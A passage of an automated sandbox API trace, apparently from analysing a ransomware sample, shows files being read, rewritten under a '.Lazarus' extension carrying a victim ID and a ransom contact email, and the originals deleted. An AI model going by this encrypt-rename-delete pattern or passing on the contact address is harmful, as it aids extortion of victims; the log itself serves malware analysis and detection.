nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0076.418] GetLastError () returned 0x0 [0076.418] SetLastError (dwErrCode=0x0) [0076.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe) returned 0x7d618 [0076.418] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0076.418] GetLastError () returned 0x0 [0076.418] SetLastError (dwErrCode=0x0) [0076.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0076.418] WriteFile (in: hFile=0x42c, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327ef70*=0x480, lpOverlapped=0x0) returned 1 [0076.419] GetLastError () returned 0x0 [0076.419] SetLastError (dwErrCode=0x0) [0076.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0076.419] GetLastError () returned 0x0 [0076.419] SetLastError (dwErrCode=0x0) [0076.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0076.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0076.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0076.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0076.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0076.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x92460 | out: hHeap=0x20000) returned 1 [0076.419] CloseHandle (hObject=0x42c) returned 1 [0076.421] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0076.421] CloseHandle (hObject=0x410) returned 1 [0076.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0076.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0076.421] AreFileApisANSI () returned 1 [0076.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0076.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0076.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=48 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 48 [0076.421] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0076.422] GetFileType (hFile=0x410) returned 0x1 [0076.422] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0076.422] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0076.422] GetLastError () returned 0xb7 [0076.422] SetLastError (dwErrCode=0xb7) [0076.422] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0076.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0076.423] CloseHandle (hObject=0x410) returned 1 [0076.424] AreFileApisANSI () returned 1 [0076.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0076.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0076.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=48 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 48 [0076.424] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico")) returned 1 [0076.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0076.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0076.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0076.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0076.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0076.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0076.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0076.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0076.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0076.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d7b0 | out: hHeap=0x20000) returned 1 [0076.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x94680 | out: hHeap=0x20000) returned 1 [0076.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c288 | out: hHeap=0x20000) returned 1 [0076.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0076.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0076.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0076.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0076.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0076.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0076.425] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.425] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.425] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x1, dwReserved1=0x0, cFileName="warn.ico", cAlternateFileName="")) returned 1 [0076.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0076.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0076.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0076.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0076.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0076.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0076.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0076.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0076.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0076.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0076.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0076.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0076.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0076.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0076.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0076.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0076.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0076.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0076.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0076.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71a30 [0076.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0076.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0076.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0076.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0076.426] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.426] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.426] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.426] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0076.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0076.426] AreFileApisANSI () returned 1 [0076.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\warn.ico", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\warn.ico", lpUsedDefaultChar=0x0) returned 40 [0076.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0076.426] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.426] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0076.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0076.427] AreFileApisANSI () returned 1 [0076.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0076.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0076.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x6d688, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 40 [0076.427] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0076.427] GetFileType (hFile=0x410) returned 0x1 [0076.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0076.427] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0076.427] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0076.427] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0076.427] CloseHandle (hObject=0x410) returned 1 [0076.428] AreFileApisANSI () returned 1 [0076.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0076.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0076.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x6d738, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 40 [0076.428] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0076.428] GetFileType (hFile=0x410) returned 0x1 [0076.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0076.428] CloseHandle (hObject=0x410) returned 1 [0076.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0076.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0076.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0076.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0076.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0076.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0076.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0076.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0076.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0076.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0076.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0076.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0076.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0076.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0076.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0076.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0076.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0076.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0076.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0076.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0076.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0076.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0076.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0076.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0076.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0076.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0076.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0076.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0076.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0076.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0076.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0076.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0076.429] AreFileApisANSI () returned 1 [0076.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0076.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0076.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x6d688, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 40 [0076.429] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x2796)) returned 1 [0076.429] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0076.429] AreFileApisANSI () returned 1 [0076.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0076.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0076.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0076.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0076.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0076.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0076.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0076.430] GetLastError () returned 0x0 [0076.430] SetLastError (dwErrCode=0x0) [0076.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e298 [0076.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x94680 [0076.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bae0 [0076.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6d8 [0076.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0076.430] GetLastError () returned 0x0 [0076.430] SetLastError (dwErrCode=0x0) [0076.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0076.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0076.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68d60 [0076.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0076.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75dc8 [0076.430] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0076.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0076.430] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0076.430] AreFileApisANSI () returned 1 [0076.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 102 [0076.431] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xcc) returned 0x74a18 [0076.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x74a18, cchWideChar=102 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\warn.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 102 [0076.431] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0076.531] GetFileType (hFile=0x410) returned 0x1 [0076.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x74a18 | out: hHeap=0x20000) returned 1 [0076.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0076.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0076.532] AreFileApisANSI () returned 1 [0076.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0076.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0076.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x6d1b8, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\warn.ico") returned 40 [0076.532] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\warn.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\warn.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0076.532] GetFileType (hFile=0x42c) returned 0x1 [0076.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0076.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a4b0 [0076.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0076.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0076.532] GetLastError () returned 0x0 [0076.532] SetLastError (dwErrCode=0x0) [0076.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0076.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0076.533] GetLastError () returned 0x0 [0076.533] SetLastError (dwErrCode=0x0) [0076.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0076.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0076.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0076.533] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0076.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0076.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0076.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x92460 [0076.536] GetLastError () returned 0x0 [0076.536] SetLastError (dwErrCode=0x0) [0076.536] GetLastError () returned 0x0 [0076.536] SetLastError (dwErrCode=0x0) [0076.536] GetLastError () returned 0x0 [0076.536] SetLastError (dwErrCode=0x0) [0076.537] GetLastError () returned 0x0 [0076.537] SetLastError (dwErrCode=0x0) [0076.537] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, 